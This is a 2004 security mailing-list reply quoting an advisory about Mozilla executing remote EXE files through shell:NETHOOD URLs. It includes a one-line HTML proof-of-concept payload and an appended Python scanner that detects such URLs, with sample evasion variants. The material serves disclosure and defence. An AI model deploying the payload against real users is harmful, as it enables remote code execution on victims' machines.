Re: [Full-Disclosure] MOZILLA: SHELL can execute remote EXE program

From: Barry Fitzgerald (bkfsec_at_SDF.LONESTAR.ORG)
Date: 07/09/04

    Date:         Fri, 9 Jul 2004 09:51:06 -0400
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    Interesting... I was trying to determine if the shell: exploit could be
    used to execute remote code on a known web server but hadn't approached
    it from the SMB angle.

    The obvious mitigating factor for this exploit is that someone would
    need to have prior knowledge of which SMB shares had been visited by the
    user, or otherwise try to manipulate those. Unless there is a way to merge
    this flaw with an automated method of placing this shortcut into the nethood
    and controlling what content is on said share, this vulnerability would
    almost definitely not be usable in a widespread exploit.

    It could be a danger in situations where the cracker has prior knowledge
    of the network environment, though.

                    -Barry

    liudieyu@umbrella.name wrote:

    >SUBJ: MOZILLA: SHELL can execute remote EXE program
    >DATE: 2004/07/09
    >FROM: Liu Die Yu <liudieyu AT umbrella D0T name>
    >############################################################
    >[START] Advisory
    >############################################################
    >
    >COPYRIGHT
    >---------
    >This Advisory is Copyright (c) 2004 "Liu Die Yu".
    >You may distribute it unmodified.
    >You may not modify it and distribute it or distribute parts of it without the
    >author's written permission.
    >( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )
    >
    >TESTED
    >------
    >MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616")
    >running on winxp.en.home.sp1a.up2date.20040709
    >
    >PROCESS
    >-------
    >VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p".
    >THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT
    >"shell:NETHOOD"
    >
    >AT LAST, MAKE MOZILLA REQUEST THE FOLLOWING URL:
    >shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe
    >
    >A FILE NAMED "fileid.exe" IN THE "shared" FOLDER WILL BE EXECUTED.
    >
    >REFERENCE
    >---------
    >MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
    >http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
    >greetingz fly to perrymonj.
    >
    >WINDOWS support "shell:NETHOOD":
    >http://does-not-exist.org/mail-archives/bugtraq/msg02171.html
    >thanks to malware for his additional research, and Cheng Peng Su for his
    >original discovery.
    >
    >
    >
    >liudieyu
    >
    >http://umbrella.name
    >
    >############################################################
    >[START] PROOF OF CONCEPT
    >############################################################
    ><!--
    >MOZILLA REMOTE COMPROMISE DEMO
    >
    >REPLACE "[" WITH "<", and REPLACE "]" WITH ">".
    >
    >!!!!! WARNING !!!!!
    >THIS DEMO WILL NOT WORK WITHOUT PROPER MODIFICATION.
    >
    >PROCESS:
    >1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED
    >"X-6487ohu4s6x0p".
    > THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER
    >AT "shell:NETHOOD"
    >2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE NAMED "fileid.exe" IN THE
    >"shared" FOLDER.
    >
    >CREATED BY:
    >"Liu Die Yu" -> LIUDIEYU at UMBRELLA D0T NAME
    >
    >COPYRIGHT:
    >This Demo is Copyright (c) 2004 "Liu Die Yu".
    >You may distribute it unmodified.
    >You may not modify it and distribute it or distribute parts of it without the
    >author's written permission.
    >( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )
    >-->
    >
    >[IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]

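A defensive check for the pattern described in the advisory above, added here and not part of the original thread or of Mozilla's code: a Python scanner a content filter or mail gateway could run over HTML to flag references to the Windows shell: handler in URL-bearing attributes. The attribute list and the sample page are assumptions constructed for the example.

```python
"""Flag shell: protocol URLs embedded in HTML (added example, not from the advisory)."""
from html.parser import HTMLParser
import re

# Attributes Gecko-era browsers load as URLs; an assumed, not exhaustive, list.
URL_ATTRS = {"src", "href", "data", "action", "background", "codebase", "longdesc"}

# Browsers ignore leading whitespace/control characters in a URL and compare
# the scheme case-insensitively, so normalise before matching.
_SCHEME_RE = re.compile(r"^[\s\x00-\x1f]*shell\s*:", re.IGNORECASE)


class ShellUrlScanner(HTMLParser):
    """Collects (tag, attribute, url) for every attribute whose value uses shell:."""

    def __init__(self):
        super().__init__()  # convert_charrefs=True: &#115;hell: is decoded to shell:
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None or name not in URL_ATTRS:
                continue
            if _SCHEME_RE.match(value):
                self.findings.append((tag, name, value.strip()))


def find_shell_urls(doc):
    """Return a list of (tag, attribute, url) for each shell: URL in doc."""
    parser = ShellUrlScanner()
    parser.feed(doc)
    parser.close()
    return parser.findings


def classify(url):
    """Return the shell: folder name targeted, e.g. NETHOOD (network shortcuts)."""
    body = url.split(":", 1)[1].lstrip()
    return re.split(r"[\\/]", body, 1)[0].strip().upper()


# Constructed sample mirroring the advisory's PoC, with the [ ] brackets restored
SAMPLE = r'''<html><body>
<img src="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe">
<a href=" SHELL:windows\notepad.exe">leading space, upper-case scheme</a>
<a href="&#115;hell:NETHOOD\x\y.exe">entity-encoded scheme</a>
<img src="http://example.invalid/a.png">
</body></html>'''

if __name__ == "__main__":
    for tag, attr, url in find_shell_urls(SAMPLE):
        print(f"{tag} {attr}: folder={classify(url)} url={url}")
```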

